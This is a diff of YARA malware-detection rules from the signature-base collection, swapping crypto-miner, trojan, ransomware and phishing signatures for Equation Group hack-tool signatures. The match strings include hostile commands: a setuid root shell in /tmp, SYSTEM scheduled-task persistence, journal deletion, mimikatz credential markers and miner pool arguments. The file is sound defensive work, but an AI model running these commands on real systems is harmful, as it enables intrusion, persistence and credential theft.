+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "65ed8066a3a240ee2e7556da74933a9b25c5109ffad893c21a626ea1b686d7c1"
 
 	strings:
-		$s2 = "CoinHive.CONFIG.REQUIRES_AUTH" fullword ascii
+		$s1 = "chown root:root /tmp/.scsi/dev/bin/gsh" fullword ascii
+		$s2 = "chmod 4777 /tmp/.scsi/dev/bin/gsh" fullword ascii
 
 	condition:
-		filesize < 65KB and 1 of them
+		( filesize < 1KB and 1 of them )
 }
-rule SIGNATURE_BASE_PUA_Cryptominer_Jan19_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Orleans_Stride_Sunos5_9_V_2_4_0 : FILE
 {
 	meta:
-		description = "Detects Crypto Miner strings"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aebfdce9-c2dd-5f24-aa25-071e1a961239"
-		date = "2019-01-31"
+		id = "ec83e1c0-91a9-5f9d-a1d2-94be725bc05a"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pua_cryptocoin_miner.yar#L35-L52"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1171-L1186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7097d404e0317230a5f60fc66fbcb2a2a5315f8fd348a7e689aaf75c26684f9e"
-		score = 80
+		logic_hash = "1380b22e661926ebb2878d89c80e115a58d0bfc060681a55564c97c1e9f36765"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6a30efb87b28e1a136a66c7708178c27d63a4a76c9c839b2fc43853158cb55ff"
 
 	strings:
-		$s1 = "Stratum notify: invalid Merkle branch" fullword ascii
-		$s2 = "-t, --threads=N       number of miner threads (default: number of processors)" fullword ascii
-		$s3 = "User-Agent: cpuminer/" ascii
-		$s4 = "hash > target (false positive)" fullword ascii
-		$s5 = "thread %d: %lu hashes, %s khash/s" fullword ascii
+		$s1 = "_lib_version" ascii
+		$s2 = ",%02d%03d" fullword ascii
+		$s3 = "TRANSIT" fullword ascii
 
 	condition:
-		filesize < 1000KB and 1 of them
+		( uint16( 0 ) == 0x457f and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_PUA_Crypto_Mining_Commandline_Indicators_Oct21 : SCRIPT FILE
+rule SIGNATURE_BASE_Equationgroup_Morerats_Client_Noprep : FILE
 {
 	meta:
-		description = "Detects command line parameters often used by crypto mining software"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "afe5a63a-08c3-5cb7-b4b1-b996068124b7"
-		date = "2021-10-24"
+		id = "27e9e51a-c853-5dcc-97d2-d3d31c5ccfac"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://www.poolwatch.io/coin/monero"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pua_cryptocoin_miner.yar#L54-L88"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1188-L1203"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7ae1a77d8ff02ec539ce2b8be668530c3f509f0c408dfa7f2b749b0a4d6f45b7"
-		score = 65
+		logic_hash = "c27815333e05d318bc32d01e755386bc1d1dbfd9f2b92a460fbd0f703e9ba210"
+		score = 75
 		quality = 85
-		tags = "SCRIPT, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a5b191a8ede8297c5bba790ef95201c516d64e2898efaeb44183f8fdfad578bb"
 
 	strings:
-		$s01 = " --cpu-priority="
-		$s02 = "--donate-level=0"
-		$s03 = " -o pool."
-		$s04 = " -o stratum+tcp://"
-		$s05 = " --nicehash"
-		$s06 = " --algo=rx/0 "
-		$se1 = "LS1kb25hdGUtbGV2ZWw9"
-		$se2 = "0tZG9uYXRlLWxldmVsP"
-		$se3 = "tLWRvbmF0ZS1sZXZlbD"
-		$se4 = "c3RyYXR1bSt0Y3A6Ly"
-		$se5 = "N0cmF0dW0rdGNwOi8v"
-		$se6 = "zdHJhdHVtK3RjcDovL"
-		$se7 = "c3RyYXR1bSt1ZHA6Ly"
-		$se8 = "N0cmF0dW0rdWRwOi8v"
-		$se9 = "zdHJhdHVtK3VkcDovL"
+		$x1 = "storestr = 'echo -n \"%s\" | Store --nullterminate --file=\"%s\" --set=\"%s\"' % (nopenargs, outfile, VAR_NAME)" fullword ascii
+		$x2 = "The NOPEN-args provided are injected into infile if it is a valid" fullword ascii
+		$x3 = " -i                do not autokill after 5 hours" fullword ascii
 
 	condition:
-		filesize < 5000KB and 1 of them
+		( filesize < 9KB and 1 of them )
 }
-rule SIGNATURE_BASE_Dexter_Malware
+rule SIGNATURE_BASE_Equationgroup_Cursezinger_Linuxrh7_3_V_2_0_0 : FILE
 {
 	meta:
-		description = "Detects the Dexter Trojan/Agent http://goo.gl/oBvy8b"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8be328ec-ba29-50ba-8d35-e2c4dfcae45e"
-		date = "2015-02-10"
+		id = "d4cab478-da1e-54ef-995a-897d1813619e"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/oBvy8b"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_dexter_trojan.yar#L1-L17"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1205-L1221"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3b05bccce63c1f7e8d6d3f654b611f33da5fc1dbcbd28ff28f817d00bf961e64"
-		score = 70
-		quality = 60
-		tags = ""
+		logic_hash = "fa56fe4dd44d266741a3f0b0edfc24660b260c1ade45c23171f22bc43a3bee75"
+		score = 75
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "af7c7d03f59460fa60c48764201e18f3bd3f72441fd2e2ff6a562291134d2135"
 
 	strings:
-		$s0 = "Java Security Plugin" fullword wide
-		$s1 = "%s\\%s\\%s.exe" fullword wide
-		$s2 = "Sun Java Security Plugin" fullword wide
-		$s3 = "\\Internet Explorer\\iexplore.exe" wide
+		$s1 = ",%02d%03d" fullword ascii
+		$s2 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
+		$s3 = "__strtoll_internal" ascii
+		$s4 = "__strtoul_internal" ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x457f and filesize < 400KB and all of them )
 }
-rule SIGNATURE_BASE_Furtim_Nativedll : FILE
+rule SIGNATURE_BASE_Equationgroup_Seconddate_Implantstandalone_3_0_3 : FILE
 {
 	meta:
-		description = "Detects Furtim malware - file native.dll"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4639b637-55d3-5591-9278-5a21de23ac72"
-		date = "2016-06-13"
+		id = "08b1aa88-8731-51db-b659-96147f509bcd"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "MISP 3971"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_furtim.yar#L8-L25"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1223-L1238"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f9673cdd1e8e38f98b9625291a03011d5cfce78c689eab491ff189c4e039e1ef"
+		logic_hash = "8d56f471104bfb2ef2bf730e5a8b60c123706f12eb52226895b123b16eed2883"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948"
+		hash1 = "d687aa644095c81b53a69c206eb8d6bdfe429d7adc2a57d87baf8ff8d4233511"
 
 	strings:
-		$s1 = "FqkVpTvBwTrhPFjfFF6ZQRK44hHl26" fullword ascii
-		$op0 = { e0 b3 42 00 c7 84 24 ac }
-		$op1 = { a1 e0 79 44 00 56 ff 90 10 01 00 00 a1 e0 79 44 }
-		$op2 = { bf d0 25 44 00 57 89 4d f0 ff 90 d4 02 00 00 59 }
+		$s1 = "EFDGHIJKLMNOPQRSUT" fullword ascii
+		$s2 = "G8HcJ HcF LcF0LcN" fullword ascii
+		$s3 = "GhHcJ0HcF@LcF0LcN8H" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and $s1 or all of ( $op* )
+		( uint16( 0 ) == 0x457f and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_Furtim_Parent_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Watcher_Solaris_I386_V_3_3_0 : FILE
 {
 	meta:
-		description = "Detects Furtim Parent Malware"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a47719d2-1e4f-50a9-b340-55e13f5a24d5"
-		date = "2016-07-16"
+		id = "e75c6ed9-b6e6-530d-a6ac-40bd0477754f"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://sentinelone.com/blogs/sfg-furtims-parent/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_furtim.yar#L34-L57"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1240-L1256"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ab4c7ca5c887b2a2f2949a5a6fd0d623dad47d9c1f866fb43f7f8ec38dfa6a02"
+		logic_hash = "61ded97e99e6bdfe2738c6d73719b3182d970aba8ea9d7cab751349669129de2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "766e49811c0bb7cce217e72e73a6aa866c15de0ba11d7dda3bd7e9ec33ed6963"
+		hash1 = "395ec2531970950ffafde234dded0cce0c95f1f9a22763d1d04caa060a5222bb"
 
 	strings:
-		$x1 = "dqrChZonUF" fullword ascii
-		$s1 = "Egistec" fullword wide
-		$s2 = "Copyright (C) 2016" fullword wide
-		$op1 = { c0 ea 02 88 55 f8 8a d1 80 e2 03 }
-		$op2 = { 5d fe 88 55 f9 8a d0 80 e2 0f c0 }
-		$op3 = { c4 0c 8a d9 c0 eb 02 80 e1 03 88 5d f8 8a d8 c0 }
+		$s1 = "getexecname" fullword ascii
+		$s2 = "invalid option `" fullword ascii
+		$s6 = "__fpstart" ascii
+		$s12 = "GHFIJKLMNOPQRSTUVXW" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( $x1 or ( all of ( $s* ) and all of ( $op* ) ) ) ) or all of them
+		( uint16( 0 ) == 0x457f and filesize < 700KB and all of them )
 }
-rule SIGNATURE_BASE_MAL_Crime_Win32_Rat_Parallax_Shell_Bin : FILE
+rule SIGNATURE_BASE_Equationgroup_Gr_Dev_Bin_Now : FILE
 {
 	meta:
-		description = "Detects Parallax injected code"
-		author = "@VK_Intel"
-		id = "6bb337ef-3156-589a-9b2f-fa1b21699433"
-		date = "2020-05-05"
+		description = "Equation Group hack tool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9ec19323-85d5-5edf-99eb-b452c09b870a"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/VK_Intel/status/1257714191902937088"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_rat_parallax.yar#L2-L16"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1258-L1272"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6b8c71cc19ca6f066d27a4e58d9ec347ac51d245308f2c41adf2386242581610"
+		logic_hash = "1d7f009c5593ac1b1517024b828b016d705b63f6812a49d909f35c34b936e6d7"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		tlp = "white"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f5ed8312fc6e624b04e1e2d6614f3c651c9e9902ff41f4d069c32caca0869fa4"
 
 	strings:
-		$ntdll_load = {55 8b ec 81 ec d0 08 00 00 53 56 57 e8 ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8d ?? ?? ?? ?? ?? 33 c0 b9 18 01 00 00 f3 ?? 68 02 9f e6 6a e8 ?? ?? ?? ?? 8b d8 68 40 5e c0 84 89 ?? ?? e8 ?? ?? ?? ?? 6a 00 8b f0 68 0b 1c 64 72 53 89 ?? ?? e8 ?? ?? ?? ?? 83 c4 14 89 ?? ?? ?? ?? ?? 8d ?? ?? ?? ?? ?? 68 30 02 00 00 51 ff d0 6a 6e 58 6a 74 66 ?? ?? ?? ?? ?? ?? 58 6a 64 59 6a 6c 66 ?? ?? ?? ?? ?? ?? 58 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 33 c0 6a 2e}
-		$call_func = {81 ec bc 00 00 00 8d ?? ?? 56 50 6a 00 6a 01 ff ?? ?? e8 ?? ?? ?? ?? 8b f0 83 c4 10 85 f6 0f ?? ?? ?? ?? ?? 33 c9 89 ?? ?? 39 ?? ?? 0f ?? ?? ?? ?? ?? 8b ?? ?? 53 57 8b ?? ?? 8d ?? ?? 0f ?? ?? ?? 8b ?? ?? 8d ?? ?? 8b ?? ?? 03 fa 8b df 2b da 03 ?? ?? 80 ?? ?? 0f ?? ?? ?? ?? ?? 83 ?? ?? ?? 8b c7 83 ?? ?? ?? 83 ?? ?? ?? 83 ?? ?? ?? 83 ?? ?? ?? 83 ?? ?? ?? 99 89 ?? ?? 8b ca 89 ?? ?? 8d ?? ?? 99 89 ?? ?? 89 ?? ?? 8d ?? ?? 89 ?? ?? 89 ?? ?? 8b ca 99 89 ?? ?? 89 ?? ?? 8b ca 89 ?? ?? 89 ?? ?? 8d ?? ?? 6a 40 89 ?? ??}
-		$cryp_hex = {8b ec 8b ?? ?? 25 55 55 55 55 d1 e0 8b ?? ?? d1 e9 81 e1 55 55 55 55 0b c1 89 ?? ?? 8b ?? ?? 81 e2 33 33 33 33 c1 e2 02 8b ?? ?? c1 e8 02 25 33 33 33 33 0b d0 89 ?? ?? 8b ?? ?? 81 e1 0f 0f 0f 0f c1 e1 04 8b ?? ?? c1 ea 04 81 e2 0f 0f 0f 0f 0b ca 89 ?? ?? 8b ?? ?? c1 e0 18 8b ?? ?? 81 e1 00 ff 00 00 c1 e1 08 0b c1 8b ?? ?? c1 ea 08 81 e2 00 ff 00 00 0b c2 8b ?? ?? c1 e9 18 0b c1 89 ?? ?? 8b ?? ?? 5d c3}
+		$x1 = "HTTP_REFERER=\"https://127.0.0.1:6655/cgi/redmin?op=cron&action=once\"" fullword ascii
+		$x2 = "exec /usr/share/redmin/cgi/redmin" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them or all of them
+		( filesize < 1KB and 1 of them )
 }
-rule SIGNATURE_BASE_Badrabbit_Gen : FILE
+rule SIGNATURE_BASE_Equationgroup_Gr_Dev_Bin_Post : FILE
 {
 	meta:
-		description = "Detects BadRabbit Ransomware"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "272e50f8-5aef-52ec-a5d0-01e8504d6c55"
-		date = "2017-10-25"
+		id = "9ec19323-85d5-5edf-99eb-b452c09b870a"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://pastebin.com/Y7pJv3tK"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_badrabbit.yar#L11-L40"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1274-L1287"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "21c63a02d0284ce759b087f4869c4ed8e6b50c37ffeb724538567e28aeae16ac"
+		logic_hash = "ffd95302df11d1ebab37817e967a1ad4d1e85e62b38a0ccd6adf0f36925e64c1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93"
-		hash2 = "579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648"
-		hash3 = "630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da"
+		hash1 = "c1546155efa95dbc4e3cc95299a3968fc075f89d33164e78b00b76c7d08a0591"
 
 	strings:
-		$x1 = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST" fullword wide
-		$x2 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\"" fullword wide
-		$x3 = "C:\\Windows\\infpub.dat" fullword wide
-		$x4 = "C:\\Windows\\cscc.dat" fullword wide
-		$s1 = "need to do is submit the payment and get the decryption password." fullword ascii
-		$s2 = "\\\\.\\GLOBALROOT\\ArcName\\multi(0)disk(0)rdisk(0)partition(1)" fullword wide
-		$s3 = "\\\\.\\pipe\\%ws" fullword wide
-		$s4 = "fsutil usn deletejournal /D %c:" fullword wide
-		$s5 = "Run DECRYPT app at your desktop after system boot" fullword ascii
-		$s6 = "Files decryption completed" fullword wide
-		$s7 = "Disable your anti-virus and anti-malware programs" fullword wide
-		$s8 = "SYSTEM\\CurrentControlSet\\services\\%ws" fullword wide
-		$s9 = "process call create \"C:\\Windows\\System32\\rundll32.exe" fullword wide
-		$s10 = "%ws C:\\Windows\\%ws,#1 %ws" fullword wide
+		$x1 = "op=cron&action=once&frame=cronOnceFrame&cronK=cronV&cronCommand=%2Ftmp%2Ftmpwatch&time=12%3A12+01%2F28%2F2005" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 2 of them )
+		( filesize < 1KB and all of them )
 }
-rule SIGNATURE_BASE_Badrabbit_Mimikatz_Comp : FILE
+rule SIGNATURE_BASE_Equationgroup_Curseyo_Win2K_V_1_0_0 : FILE
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "52affd3f-6bf9-55f6-92a5-69314a2e76e0"
-		date = "2017-10-25"
+		id = "8161907d-d6bd-58c5-806d-387321b93b21"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://pastebin.com/Y7pJv3tK"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_badrabbit.yar#L42-L59"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1289-L1306"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9d12d9331686a54e8d32f94761e4889710bbd2432d4cb2e4e7e3f21ef6aa082a"
+		logic_hash = "ad9bb848a0c4805a14465ff44e3c967c9afa7369536a211a8a1fb100902fbb55"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035"
+		hash1 = "5dc77614764b23a38610fdd8abe5b2274222f206889e4b0974a3fea569055ed6"
 
 	strings:
-		$s1 = "%lS%lS%lS:%lS" fullword wide
-		$s2 = "lsasrv" fullword wide
-		$s3 = "CredentialKeys" ascii
-		$s4 = { 50 72 69 6D 61 72 79 00 6D 00 73 00 76 00 }
+		$s1 = "0123456789abcdefABCEDF:" fullword ascii
+		$op0 = { c6 06 5b 8b bd 70 ff ff ff 8b 9d 64 ff ff ff 0f }
+		$op1 = { 55 b8 ff ff ff ff 89 e5 83 ec 28 89 7d fc 8b 7d }
+		$op2 = { ff 05 10 64 41 00 89 34 24 e8 df 1e 00 00 e9 31 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Brooxml_Hunting : HUNTING FILE
+rule SIGNATURE_BASE_Equationgroup_Gr : FILE
 {
 	meta:
-		description = "Detects Microsoft OOXML files with prepended data/manipulated header"
-		author = "Proofpoint"
-		id = "1ffea1c7-9f97-5bb1-93d7-ce914765416f"
-		date = "2024-11-27"
-		modified = "2025-06-02"
-		reference = "https://x.com/threatinsight/status/1861817946508763480"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_brooxml_dec24.yar#L2-L39"
+		description = "Equation Group hack tool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9ec19323-85d5-5edf-99eb-b452c09b870a"
+		date = "2017-04-09"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1308-L1322"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8a8d934fe9286c9d1c83a2a0676bb8a5f2501116b96cca32dc27136ecfb9325b"
-		score = 70
+		logic_hash = "6df2a36e51fbe23e090094a91da76ca881a65d7e129c6e428ffef13787f230bc"
+		score = 75
 		quality = 85
-		tags = "HUNTING, FILE"
-		category = "hunting"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d3cd725affd31fa7f0e2595f4d76b09629918612ef0d0307bb85ade1c3985262"
 
 	strings:
-		$pk_ooxml_magic = {50 4b 03 04 [22] 13 00 [2] 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c}
-		$pk_0102 = {50 4b 01 02}
-		$pk_0304 = {50 4b 03 04}
-		$pk_0506 = {50 4b 05 06}
-		$pk_0708 = {50 4b 07 08}
-		$word = "word/"
-		$ole = {d0 cf 11 e0}
-		$tef = {78 9f 3e 22}
+		$s1 = "if [ -f /tmp/tmpwatch ] ; then" fullword ascii
+		$s2 = "echo \"bailing. try a different name\"" fullword ascii
 
 	condition:
-		$pk_ooxml_magic in ( 4 .. 16384 ) and $pk_0506 in ( 16384 .. filesize ) and #pk_0506 == 1 and #pk_0102 > 2 and #pk_0304 > 2 and $word and not ( $pk_0102 at 0 ) and not ( $pk_0304 at 0 ) and not ( $pk_0506 at 0 ) and not ( $pk_0708 at 0 ) and not ( $ole at 0 ) and not ( uint16( 0 ) == 0x5a4d ) and not ( $tef at 0 )
+		( filesize < 1KB and all of them )
 }
-rule SIGNATURE_BASE_Brooxml_Phishing : PHISHING FILE
+rule SIGNATURE_BASE_Equationgroup_Curseroot_Win2K_V_2_1_0 : FILE
 {
 	meta:
-		description = "Detects PDF and OOXML files leading to AiTM phishing"
-		author = "Proofpoint"
-		id = "ccd8ab30-90a4-5d4b-8a77-dbc4669bdb95"
-		date = "2024-11-27"
-		modified = "2025-06-02"
-		reference = "https://x.com/threatinsight/status/1861817946508763480"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_brooxml_dec24.yar#L41-L54"
+		description = "Equation Group hack tool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bd2257ef-8170-547d-9c5e-7ff03404495c"
+		date = "2017-04-09"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1324-L1340"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "884e0b65c6c8b916ca9bc28705134ae02d1705c13cf43bff78f0c9ada894b307"
-		score = 65
+		logic_hash = "64ea35c9287ed35b5e7fbc8aaa228f87bc003111dd6fc35f5277eeea5f371a2c"
+		score = 75
 		quality = 85
-		tags = "PHISHING, FILE"
-		category = "phishing"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a1637948ed6ebbd2e582eb99df0c06b27a77c01ad1779b3d84c65953ca2cb603"
 
 	strings:
-		$hex1 = { 21 20 03 20 c3 be c3 bf 09 20 [0-1] 06 20 20 20 20 20 20 20 20 20 20 20 01 20 20 20 06 20 20 20 20 20 20 20 20 10 20 20 05 20 20 20 01 20 20 20 c3 be c3 bf c3 bf c3 bf }
+		$s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s" fullword ascii
+		$op0 = { c7 44 24 04 ff ff ff ff 89 04 24 e8 46 65 01 00 }
+		$op1 = { 8d 5d 88 89 1c 24 e8 24 1b 01 00 be ff ff ff ff }
+		$op2 = { d3 e0 48 e9 0c ff ff ff 8b 45 }
 
 	condition:
-		all of ( $hex* ) and ( ( uint16be( 0 ) == 0x504b ) or ( uint32be( 0 ) == 0x25504446 ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and $s1 and 2 of ( $op* ) )
 }
-rule SIGNATURE_BASE_SUSP_ZIP_LNK_Phishattachment_Pattern_Jun22_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Cursewham_Curserazor_Cursezinger_Curseroot_Win2K : FILE
 {
 	meta:
-		description = "Detects suspicious tiny ZIP files with phishing attachment characteristics"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3537c4ea-a51d-5100-97d7-71a24da5ff43"
-		date = "2022-06-23"
+		id = "6a877998-7021-54cb-b068-452d005955b6"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_phish_attachments.yar#L2-L21"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1342-L1362"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2ff398379e3d8112991eeacd99bf9d3bafbf3e9266f012d2539d6b2661d5969e"
-		score = 65
+		logic_hash = "a5a8e6a516b51c2eed616c80a1162990c1dda4460ec7786793d66820ca15b5a4"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "4edb41f4645924d8a73e7ac3e3f39f4db73e38f356bc994ad7d03728cd799a48"
-		hash2 = "c4fec375b44efad2d45c49f30133efbf6921ce82dbb2d1a980f69ea6383b0ab4"
-		hash3 = "9c70eeac97374213355ea8fa019a0e99e0e57c8efc43daa3509f9f98fa71c8e4"
-		hash4 = "ddc20266e38a974a28af321ab82eedaaf51168fbcc63ac77883d8be5200dcaf9"
-		hash5 = "b59788ae984d9e70b4f7f5a035b10e6537063f15a010652edd170fc6a7e1ea2f"
